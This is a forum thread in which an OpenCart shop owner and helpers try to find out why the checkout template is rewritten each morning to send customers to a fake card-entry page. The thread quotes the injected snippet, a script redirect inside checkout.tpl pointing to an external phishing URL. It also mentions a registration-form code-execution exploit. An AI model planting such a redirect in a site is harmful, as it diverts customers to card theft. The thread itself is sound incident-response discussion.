Check out fraud card website hack

We have a website selling our own product and recently we have a problem, someone come and change the check out every morning around 6 am the for a fake fraud card site, what basically ask our customers to add card details. ( https://iwetech.ie/Payment/ ) We found the code and we can change it back every day so mainly our problem is to how to prevent this to happening every day. We run opencart Version 2.1.0.2. I'm not sure what information should I provide, but feel free to ask.
Thanks guys in advance!

Funny, that https://iwetech.ie/Payment/ URL works, but it's not a valid URL,
according to Site Test Tools, if I try to check on it.
Wich means, that you probably have some Hack in your software, doing this.
Ernie

What I could find out it seems a code injection hack. Basically somehowe they edit \catalog\view\theme\default\template\checkout checkout.tpl file and insert this code :
<div id="content" class="<?php echo $class; ?>"><?php echo $content_top; ?>
<h1><?php echo $heading_title; ?></h1>
<div class="panel-group" id="accordion">
<div class="panel panel-default">
<div class="panel-heading"><script>document.location='https://iwetech.ie/Payment/'</script>
<h4 class="panel-title"><?php echo $text_checkout_option; ?></h4>
</div>
<div class="panel-collapse collapse" id="collapse-checkout-option">
<div class="panel-body"></div>
</div>
</div>

I made many research to solve this problem, but I couldn't find any usable and I'm not exactly expert is the topic, but I really need to solve this problem shortly.

Some places I read about Script tag clean strings, but again, I;m not exactly know that's a solution or if it is, how it works.

well, if this hack has been placed on the DEFAULT
\catalog\view\theme\default\template\checkout\checkout.tpl
then, someone must have access to your Software on the server.
But if the hack has been placed in the
\system\storage\modification\catalog\view\theme\default\template\checkout\checkout.tpl
then, it would have been added by some 'Darknet' OcMod, I assume.
At least, if you use a genuine OC Version, and no Extension/Mod, possibly equipped with
a modified checkout.tpl file, and downloaded from some Darknet Site.
I can't think of anyting else...
Ernie

This is the default template what we using for the website. So the first option, you mentioned.
We changed many times all the password, users for the admin, for the ftp, we changed the the user , permissions for 644, but this still happens. The OS is not from any dark web related site neither from any illegal source and in fact, we running this site like slowly more than a year, without any issues.

This hacking thing just started recently and in my opinion first of all the question is, the problem is in the back end, so maybe there is a virus, or robot or what ever can cause problems like this and rewrite the file , or this is a simple attack via the website, like XSS injection or something like that. If we know this is comes from outside, than we need to find a way to secure the site. If the problem is already in the software, than we need to reinstall the opencart to replace it with a fresh one.

The main problem we have many orders, costumer registration, what pretty hard to just simply move to the other site. If there is any other solution, we like to start with that in the first place.

well, you did not really answer my question, regarding the matter, where you
found the modified File, and since the HACK may already exist in your DB,
it does not make much sense, to install another Shop Software, and then use
it with the same DB.
You therefore have to download the entire DB Content, by use of the Server Admin
Tools, and then, check the content of the DB, to make sure, that it's clean. Then,
you just upload (not install) a NEW clean OC- Software, and link it to the DB, by use
of the already existing old config.php Files, and it will function again.
Ernie

Sorry, so what I try to say, this where they placed it : \catalog\view\theme\default\template\checkout\checkout.tpl
Not over here \system\storage\modification\catalog\view\theme\default\template\checkout\checkout.tpl

I'm not exactly sure what I need to look for in the DB. How can I spot the unwanted data?
And if I upload the new OC software, is this not going to change the structure of the site? I mean like the way it works, looks etc.

Like I said, I'm kind of noob with this kind of stuff and I would really appreciate the help in details.

and let say I upload the new OC, is enough only to replace the config.php in order to make the old data work?

Thanks anyway for you patient and help!

Well, strictly technically, YES, but it also depends on Extensions, you've possibly installed.
But you have to USE BOTH (old) config.php Files, the one in the ROOT and ADMIN Section!
But I would try something different first, just to find out:
1. Upload a clean checkout.tpl
2. CHMOD it to 444 ( if you don't know, what that means, then read here first:)
http://everyauction.info/serverinfo.html#5
3. Test the Shop, by ordering an item, and fully go trough the Checkout.
4. Wait until the next day, and check your File again.

by doing this CHMOD Change, this checkout.tpl can only be used in READ ONLY Mode,
and not changed by any outside/inside method, so, one could check the Server Error/Access log
later, to find out, what/if something else tried to modify this file again.

Just a weird Idea...
But I tested it in one of my Testshops, so, it will work!
Ernie

PS. I also contact the Site in Question, and warned them, to get their site on Blacklists,
if they don't act accordingly!
---

So I changed now to 444 and let see. I will come back with an update on this tomorrow.
Strange, because today still we didn't had the attack. So if it's a virus, someone need to trigger it, or the bot turns off and it goes for holiday on the weekend How ever, its strange!

and I really amazed with your support! Really man, You are awesome! Cheers !

Make sure you change all passwords including all FTP accounts. It sounds like you have already done this, but check you change all and remove any accounts (OpenCart and FTP) that aren't needed any more. Weak and stolen passwords are probably the most common way to get into a site.

Check the files on your server against a fresh download of your OpenCart version to see if any other files have been changed or added.

Look through your server web logs and FTP logs (you may need to ask your host for these) at around the time the attack takes place for anything suspicious.

Well it seems this trick not exactly works out, as we had the hack today as well after two days of silence. The interesting thing, we perhaps catch the attacker, as he made a registration on our site just before the script was inserted to the tpl file and all the details was fake like hell. He/she put something in the basket and seems after somehow made the XSS attack and now the script was inserted in other tpl files as well, to make sure even if we delete the from the checkout.tpl, it will comes up with the others, like address confirmation, payment method.
We find the IP, what is actually from Lybia so we lock every IP from that country in the Htaceess, but if its a VPN attack, than this is useless.

There is any way we can stop this files to run Scripts inside the HTML in certain part? So we can stop the script to trigger, even if its already inside the code..

There is not much you can do to stop scripts running in the HTML. OpenCart needs JavaScript to work. And even if there was it seems like the attacker could just remove it. You need to find and close the method the attacker is using to upload the changes.

You need to compare all the files on your server to a fresh download of OpenCart. Looking for any changes and added files. It can often be the case that an attacker will install their own backdoor once they have got into a site via another method.

Once you are sure there is no added code. It's just a case of going through the web and FTP logs to see if you can work out how they are uploading files.

Another thing you could check is that you have the PHP JSON extension installed on your server and that you denying access to folders like the system folder.

Well in my opinion somehow he injects the script somewhere at the registration stage. I believe the system should automatically avoid ruining script commands in the input fields, so when like someone like this guy, try to send scripts it should't obey, just simply get it as a text, nothing more. Like I said I'm not really a professional in this, the only thing I know what I learned in a week researching the problem, but it still seems this is a really simple XSS, just I do not know where he is inserting this to add this line to the tpl files. There is many fields he can use, like the registration form , the address line, newsletter, but I can't figure it out what to check and how to avoid it. I already find the article about the PHP JSON, but again, not clear for me what to do or why this makes the site week against attacks.

I already compare the two files and the only differences I find is the tpl file. I running out of ideas.

Today I will try to install a new OC, the up to date version on a different server to test out how I can transfer all the data.

The attacker seems to be able to write files to your server. This could not be achieved via just XSS (and if it were it would need you to be clicking on malicious links of viewing pages with hidden malicious code on). They either have direct access to your server (such as FTP) or are able to execute PHP scripts.

The JSON exploit is said to be able to PHP execute code. The examples given use the customer registration form to perform remote PHP code execution. Which is a good match to what you say you are seeing.

To check you have JSON enabled on your server, put the following in a file called info.php and copy to the html home directory or your server (same place as opencart). Then got to the info.php on your server in a web browser. On the generated page, find the JSON section and make sure json support is enabled.